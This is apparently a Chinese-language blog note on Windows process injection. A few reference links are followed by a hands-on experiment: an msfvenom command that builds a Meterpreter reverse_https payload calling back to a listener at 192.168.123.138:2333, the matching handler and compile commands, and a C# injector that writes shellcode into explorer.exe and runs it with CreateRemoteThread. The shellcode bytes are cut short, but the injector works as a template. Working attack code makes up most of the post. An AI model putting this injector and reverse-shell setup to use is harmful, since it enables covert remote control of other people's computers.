进程注入与迁移

发表于 | 分类于 | 阅读数

进程注入与迁移

进程和线程的区别

https://segmentfault.com/a/1190000039297639

进程,线程 (公司)(人) 卖食品、饮料、医疗、交通、房地产公司 进程里有多个线程,就像一个公司里有多个员工

直接反弹shell的缺点:

  2. 进程注入的目的

进程的权限控制Integrity Level

https://blog.csdn.net/vlily/article/details/47338327

plist查看进程中的线程

https://docs.microsoft.com/en-us/sysinternals/downloads/pslist

为什么直接杀死线程是不好的

https://blog.csdn.net/shenya1314/article/details/59057361

小实验

c sharp + shellcode编译,注入进程explorer.exe

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f csharp

handler -H 192.168.123.138 -P 2333 -p windows/x64/meterpreter/reverse_https

“C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\Roslyn\csc.exe” /unsafe /platform:x64 1.cs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
using System;
using System.Runtime.InteropServices;
namespace Inject
{
	class Program
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int
		processId);
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint
		dwSize, uint flAllocationType, uint flProtect);
		[DllImport("kernel32.dll")]
		static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
		byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
		[DllImport("kernel32.dll")]
		static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr
		lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint
		dwCreationFlags, IntPtr lpThreadId);
		static void Main(string[] args)
		{
			IntPtr hProcess = OpenProcess(0x001F0FFF, false, 1668);
			IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
			byte[] buf = new byte[756] {
===replace this===
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x51,0x65,0x48,0x8b,0x52,0,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5
===replace this===
			};
			IntPtr outSize;
			WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
			IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr,IntPtr.Zero, 0, IntPtr.Zero);
		}
	}
}